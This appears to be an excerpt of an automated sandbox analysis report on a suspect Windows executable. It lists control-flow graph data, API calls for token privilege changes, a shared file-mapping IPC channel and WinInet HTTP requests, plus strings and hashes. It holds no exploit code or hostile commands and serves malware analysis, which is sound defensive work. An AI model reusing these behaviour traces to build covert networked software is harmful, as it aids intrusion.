62638->62635 62646 11029450 274 API calls 2 library calls 62638->62646 62647 110812d0 62641->62647 62648 1108131d 62647->62648 62649 110812f1 62647->62649 62652 1108136a wsprintfA 62648->62652 62653 11081345 wsprintfA 62648->62653 62649->62648 62650 1108130b 62649->62650 62651 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62650->62651 62654 11081319 62651->62654 62659 11029450 274 API calls 2 library calls 62652->62659 62653->62648 62654->62587 62654->62588 62662 110ea45b 62660->62662 62661 110ea4f5 62661->62595 62662->62661 62663 110ea47e 62662->62663 62665 110ea495 62662->62665 62671 11029450 274 API calls 2 library calls 62663->62671 62666 110ea492 62665->62666 62667 110ea4c2 SendMessageTimeoutA 62665->62667 62666->62665 62672 11029450 274 API calls 2 library calls 62666->62672 62667->62661 62670->62597 62676 1106e1c4 62673->62676 62674 1106e1c8 62674->62623 62676->62674 62677 1106d9a0 67 API calls 2 library calls 62676->62677 62677->62676 62692 11134d10 62693 11134d19 62692->62693 62699 11134d48 62692->62699 62694 11145320 std::locale::_Init 93 API calls 62693->62694 62695 11134d1e 62694->62695 62696 11132bf0 282 API calls 62695->62696 62695->62699 62697 11134d27 62696->62697 62698 1105dd10 78 API calls 62697->62698 62697->62699 62698->62699 62700 110310c0 62701 110310ce 62700->62701 62702 11145e80 274 API calls 62701->62702 62703 110310df SetUnhandledExceptionFilter 62702->62703 62704 110310ef std::locale::_Init 62703->62704 62705 11040860 62706 11040892 62705->62706 62707 11040898 62706->62707 62712 110408b4 62706->62712 62708 110facc0 15 API calls 62707->62708 62710 110408aa CloseHandle 62708->62710 62709 110409c8 62711 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62709->62711 62710->62712 62714 110409d5 62711->62714 62712->62709 62717 110408ed 62712->62717 62737 11087ee0 306 API calls 5 library calls 62712->62737 62713 11040948 62727 110facc0 GetTokenInformation 62713->62727 62717->62709 
62717->62713 62718 1104095a 62719 11040962 CloseHandle 62718->62719 62722 11040969 62718->62722 62719->62722 62720 110409ab 62723 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62720->62723 62721 11040991 62724 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62721->62724 62722->62720 62722->62721 62725 110409c4 62723->62725 62726 110409a7 62724->62726 62728 110fad08 62727->62728 62729 110facf7 62727->62729 62738 110f1f50 9 API calls 62728->62738 62730 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62729->62730 62732 110fad04 62730->62732 62732->62718 62733 110fad2c 62733->62729 62734 110fad34 62733->62734 62735 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62734->62735 62736 110fad5a 62735->62736 62736->62718 62737->62717 62738->62733 62739 11089a40 62740 1110f6c0 ___DllMainCRTStartup 4 API calls 62739->62740 62741 11089a53 62740->62741 62743 11089a5d 62741->62743 62751 11089150 277 API calls std::locale::_Init 62741->62751 62744 11089a84 62743->62744 62752 11089150 277 API calls std::locale::_Init 62743->62752 62747 11089a93 62744->62747 62748 11089a10 62744->62748 62753 110896a0 62748->62753 62751->62743 62752->62744 62790 11088970 6 API calls ___DllMainCRTStartup 62753->62790 62755 110896d9 GetParent 62756 110896ec 62755->62756 62757 110896fd 62755->62757 62758 110896f0 GetParent 62756->62758 62759 11163fed std::locale::_Init 137 API calls 62757->62759 62758->62757 62758->62758 62760 11089716 std::ios_base::_Tidy 62759->62760 62791 11013830 22 API calls 2 library calls 62760->62791 62762 1108974a 62762->62762 62763 11143230 std::locale::_Init 8 API calls 62762->62763 62766 1108978a std::ios_base::_Tidy 62763->62766 62764 110897a5 62765 11163db7 std::locale::_Init 104 API calls 62764->62765 62768 110897c3 62764->62768 62765->62768 62766->62764 62767 11142290 std::locale::_Init 274 API calls 62766->62767 62767->62764 62770 1102a620 std::locale::_Init 
144 API calls 62768->62770 62787 11089874 std::ios_base::_Tidy 62768->62787 62769 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62771 11089962 62769->62771 62772 11089813 62770->62772 62771->62747 62773 11142290 std::locale::_Init 274 API calls 62772->62773 62774 1108981b 62773->62774 62775 11081b40 std::locale::_Init IsDBCSLeadByte 62774->62775 62776 11089832 62775->62776 62777 11081bb0 87 API calls 62776->62777 62776->62787 62778 1108984a 62777->62778 62779 1108988e 62778->62779 62780 11089851 62778->62780 62782 11081bb0 87 API calls 62779->62782 62792 110b75d0 62780->62792 62784 11089899 62782->62784 62786 110b75d0 68 API calls 62784->62786 62784->62787 62785 110b75d0 68 API calls 62785->62787 62788 110898a6 62786->62788 62787->62769 62788->62787 62789 110b75d0 68 API calls 62788->62789 62789->62787 62790->62755 62791->62762 62795 110b75b0 62792->62795 62798 111672e3 62795->62798 62801 11167264 62798->62801 62802 11167271 62801->62802 62803 1116728b 62801->62803 62819 11169302 66 API calls __getptd_noexit 62802->62819 62803->62802 62805 11167294 GetFileAttributesA 62803->62805 62807 111672a2 GetLastError 62805->62807 62813 111672b8 62805->62813 62806 11167276 62820 111692ef 66 API calls __getptd_noexit 62806->62820 62822 11169315 66 API calls 3 library calls 62807->62822 62808 11089857 62808->62785 62808->62787 62811 1116727d 62821 1116df04 11 API calls _fputs 62811->62821 62812 111672ae 62823 111692ef 66 API calls __getptd_noexit 62812->62823 62813->62808 62824 11169302 66 API calls __getptd_noexit 62813->62824 62817 111672cb 62825 111692ef 66 API calls __getptd_noexit 62817->62825 62819->62806 62820->62811 62821->62808 62822->62812 62823->62808 62824->62817 62825->62812 62826 111071e0 62827 111071ec 62826->62827 62828 1110721d 62827->62828 62829 111450a0 std::locale::_Init 93 API calls 62827->62829 62873 11106100 286 API calls std::locale::_Init 62828->62873 62832 11107201 62829->62832 62831 11107223 62832->62828 62836 111062e0 
[Control-flow graph residue: the page here carries the Graphviz edge list of the sample's control-flow graph as plain text (node ids and code addresses in the 0x110xxxxx range). The API-call edges in this part of the graph reference, among others, LoadLibraryA, GetProcAddress, FreeLibrary, OpenProcess, OpenProcessToken, GetTokenInformation, K32GetProcessImageFileNameA, K32GetProcessMemoryInfo, GetProcessHandleCount, GetCurrentProcess, GetModuleFileNameA, CoInitialize, CoInitializeSecurity, CoCreateInstance, SysAllocString, FindWindowA, IsWindowVisible, IsIconic, GetForegroundWindow, SetForegroundWindow, EnableWindow, PostMessageA, SetWindowTextA, SetDlgItemTextA, RegCloseKey, OpenMutexA, CreateMutexA, WaitForSingleObject, WaitForMultipleObjects, TlsAlloc, EncodePointer, DecodePointer, HeapCreate, GetSystemTimeAsFileTime, GetCommandLineA and GetStartupInfoW.]

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 725 1109e221-1109e235 LocalAlloc 719->725 726 1109e384-1109e386 719->726 721 1109e812-1109e82d call 11161d01 720->721 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 725->728 729 1109e805-1109e80b call 1109d4d0 725->729 730 1109e316-1109e33b CreateFileMappingA 726->730 731 1109e2fa-1109e310 728->731 732 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->732 729->720 734 1109e388-1109e39b GetLastError 730->734 735 1109e33d-1109e35d GetLastError call 1112ef20 730->735 731->730 762 1109e2e9-1109e2f1 732->762 763 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 732->763 737 1109e39d 734->737 738 1109e3a2-1109e3b9 MapViewOfFile 734->738 746 1109e368-1109e370 735->746 747 1109e35f-1109e366 LocalFree 735->747 737->738 741 1109e3bb-1109e3d6 call 1112ef20 738->741 742 1109e3f7-1109e3ff 738->742 765 1109e3d8-1109e3d9 LocalFree 741->765 766 1109e3db-1109e3e3 741->766 744 1109e4a1-1109e4b3 742->744 745 1109e405-1109e41e GetModuleFileNameA 742->745 750 1109e4f9-1109e512 call 11161d20 GetTickCount 744->750 751 1109e4b5-1109e4b8 744->751 752 1109e4bd-1109e4d8 call 1112ef20 745->752 753 1109e424-1109e42d 745->753 754 1109e372-1109e373 LocalFree 746->754 755 1109e375-1109e37f 746->755 747->746 781 1109e514-1109e519 750->781 758 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 751->758 779 1109e4da-1109e4db LocalFree 752->779 780 1109e4dd-1109e4e5 752->780 753->752 759 1109e433-1109e436 753->759 754->755 761 1109e7fe-1109e800 call 1109d8c0 755->761 783 1109e60b-1109e622 CreateEventA 758->783 784 1109e605 758->784 768 1109e479-1109e49c call 1112ef20 call 1109d8c0 759->768 769 1109e438-1109e43c 759->769 761->729 762->731 773 1109e2f3-1109e2f4 FreeLibrary 762->773 763->762 772 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 
763->772 765->766 775 1109e3e8-1109e3f2 766->775 776 1109e3e5-1109e3e6 LocalFree 766->776 768->744 769->768 778 1109e43e-1109e449 769->778 772->762 773->731 775->761 776->775 785 1109e450-1109e454 778->785 779->780 786 1109e4ea-1109e4f4 780->786 787 1109e4e7-1109e4e8 LocalFree 780->787 788 1109e51b-1109e52a 781->788 789 1109e52c 781->789 793 1109e624-1109e643 GetLastError * 2 call 1112ef20 783->793 794 1109e646-1109e64e 783->794 784->783 791 1109e470-1109e472 785->791 792 1109e456-1109e458 785->792 786->761 787->786 788->781 788->789 795 1109e52e-1109e534 789->795 802 1109e475-1109e477 791->802 799 1109e45a-1109e460 792->799 800 1109e46c-1109e46e 792->800 793->794 803 1109e650 794->803 804 1109e656-1109e667 CreateEventA 794->804 797 1109e545-1109e59d 795->797 798 1109e536-1109e543 795->798 797->758 798->795 798->797 799->791 805 1109e462-1109e46a 799->805 800->802 802->752 802->768 803->804 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 804->807 808 1109e68b-1109e693 804->808 805->785 805->800 807->808 809 1109e69b-1109e6ad CreateEventA 808->809 810 1109e695 808->810 812 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 809->812 813 1109e6d1-1109e6d9 809->813 810->809 812->813 816 1109e6db 813->816 817 1109e6e1-1109e6f2 CreateEventA 813->817 816->817 819 1109e714-1109e722 817->819 820 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->820 822 1109e724-1109e725 LocalFree 819->822 823 1109e727-1109e72f 819->823 820->819 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->761 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->761 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 
1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
                                                                                      APIs
                                                                                        • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,4012B9B4,00080000,00000000,00000000), ref: 1109D46D
                                                                                        • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                        • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                        • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                      • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,4012B9B4,00080000,00000000,00000000), ref: 1109E225
                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                      • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                      • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                      • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                      • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                      • GetLastError.KERNEL32 ref: 1109E33D
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                      • GetLastError.KERNEL32 ref: 1109E390
                                                                                      • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                        • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                        • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                      • _memset.LIBCMT ref: 1109E500
                                                                                      • GetTickCount.KERNEL32 ref: 1109E508
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                      • GetLastError.KERNEL32 ref: 1109E624
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                      • GetLastError.KERNEL32 ref: 1109E669
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                      • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                      • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                      • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                      • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                      • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                      • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                      • API String ID: 3291243470-2792520954
                                                                                      • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                      • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 853 1102972a-1102972d 851->853 854 1102968b-110296a3 call 11162b51 851->854 855 11029653-1102966a GetProcAddress 852->855 856 1102966c-1102966f 852->856 858 11029748-11029760 InternetOpenA 853->858 859 1102972f-11029746 GetProcAddress 853->859 865 110296c4-110296d0 854->865 866 110296a5-110296be GetProcAddress 854->866 855->856 860 11029671-11029673 SetLastError 855->860 856->851 864 11029784-11029790 call 11162be5 858->864 859->858 863 11029779-11029781 SetLastError 859->863 860->851 863->864 872 11029796-110297c7 call 11142290 call 11164390 864->872 873 11029a0a-11029a14 864->873 871 110296d2-110296db GetLastError 865->871 876 110296f1-110296f3 865->876 866->865 868 11029762-1102976a SetLastError 866->868 868->871 871->876 877 110296dd-110296ef call 11162be5 call 11162b51 871->877 894 110297c9-110297cc 872->894 895 110297cf-110297e4 call 11081a70 * 2 872->895 873->845 875 11029a1a 873->875 879 11029a2c-11029a2f 875->879 880 11029710-1102971c 876->880 881 110296f5-1102970e GetProcAddress 876->881 877->876 885 11029a31-11029a36 879->885 886 11029a3b-11029a3e 879->886 880->853 898 1102971e-11029727 880->898 881->880 884 1102976f-11029777 SetLastError 881->884 884->853 890 11029b9f-11029ba7 885->890 891 11029a40-11029a45 886->891 892 11029a4a 886->892 896 11029bb0-11029bc3 890->896 897 11029ba9-11029baa FreeLibrary 890->897 899 11029b6f-11029b74 891->899 900 11029a4d-11029a55 892->900 894->895 918 110297e6-110297ea 895->918 919 110297ed-110297f9 895->919 897->896 898->853 905 11029b76-11029b8d GetProcAddress 899->905 906 11029b8f-11029b95 899->906 903 11029a57-11029a6e 
GetProcAddress 900->903 904 11029a74-11029a7d 900->904 903->904 908 11029b2e-11029b30 SetLastError 903->908 913 11029a80-11029a82 904->913 905->906 909 11029b97-11029b99 SetLastError 905->909 906->890 911 11029b36-11029b3d 908->911 909->890 914 11029b4c-11029b6d call 110278a0 * 2 911->914 913->911 916 11029a88-11029a8d 913->916 914->899 916->914 920 11029a93-11029acf call 1110f4a0 call 11027850 916->920 918->919 923 11029824-11029829 919->923 924 110297fb-110297fd 919->924 942 11029ae1-11029ae3 920->942 943 11029ad1-11029ad4 920->943 926 1102982b-1102983c GetProcAddress 923->926 927 1102983e-11029855 InternetConnectA 923->927 929 11029814-1102981a 924->929 930 110297ff-11029812 GetProcAddress 924->930 926->927 932 11029881-1102988c SetLastError 926->932 933 110299f7-11029a07 call 111618c1 927->933 934 1102985b-1102985e 927->934 929->923 930->929 936 1102981c-1102981e SetLastError 930->936 932->933 933->873 939 11029860-11029862 934->939 940 11029899-110298a1 934->940 936->923 944 11029864-11029877 GetProcAddress 939->944 945 11029879-1102987f 939->945 946 110298a3-110298b7 GetProcAddress 940->946 947 110298b9-110298d4 940->947 950 11029ae5 942->950 951 11029aec-11029af1 942->951 943->942 949 11029ad6-11029ada 943->949 944->945 952 11029891-11029893 SetLastError 944->952 945->940 946->947 953 110298d6-110298de SetLastError 946->953 955 110298e1-110298e4 947->955 949->942 956 11029adc 949->956 950->951 957 11029af3-11029b09 call 110d1090 951->957 958 11029b0c-11029b0e 951->958 952->940 953->955 960 110299f2-110299f5 955->960 961 110298ea-110298ef 955->961 956->942 957->958 963 11029b10-11029b12 958->963 964 11029b14-11029b25 call 111618c1 958->964 960->933 968 11029a1c-11029a29 call 111618c1 960->968 966 110298f1-11029908 GetProcAddress 961->966 967 1102990a-11029916 961->967 963->964 970 11029b3f-11029b49 call 111618c1 963->970 964->914 975 11029b27-11029b29 964->975 966->967 973 11029918-11029920 SetLastError 966->973 979 11029922-1102993b GetLastError 967->979 
968->879 970->914 973->979 975->900 980 11029956-1102996b 979->980 981 1102993d-11029954 GetProcAddress 979->981 983 11029975-11029983 GetLastError 980->983 981->980 982 1102996d-1102996f SetLastError 981->982 982->983 985 11029985-1102998a 983->985 986 1102998c-11029998 GetDesktopWindow 983->986 985->986 987 110299e2-110299e7 985->987 988 110299b3-110299cf 986->988 989 1102999a-110299b1 GetProcAddress 986->989 987->960 991 110299e9-110299ef 987->991 988->960 993 110299d1 988->993 989->988 990 110299d6-110299e0 SetLastError 989->990 990->960 991->960 993->955
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll,4012B9B4,74DF23A0,?,00000000), ref: 110295C5
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                      • _malloc.LIBCMT ref: 11029697
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                      • GetLastError.KERNEL32 ref: 110296D2
                                                                                      • _free.LIBCMT ref: 110296DE
                                                                                      • _malloc.LIBCMT ref: 110296E7
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                      • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                      • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                      • _free.LIBCMT ref: 11029785
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                      • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                      • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                      • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                      • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                      • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                      • API String ID: 921868004-913974648
                                                                                      • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                      • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                      APIs
                                                                                        • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,00EEB898,000000FF,?), ref: 11144ED5
                                                                                        • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00EEB898,000000FF,?), ref: 11144EE5
                                                                                      • _fgets.LIBCMT ref: 11061DC2
                                                                                      • _strpbrk.LIBCMT ref: 11061E29
                                                                                      • _fgets.LIBCMT ref: 11061F2C
                                                                                      • _strpbrk.LIBCMT ref: 11061FA3
                                                                                      • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                      • _fgets.LIBCMT ref: 11062035
                                                                                      • _strpbrk.LIBCMT ref: 1106205B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
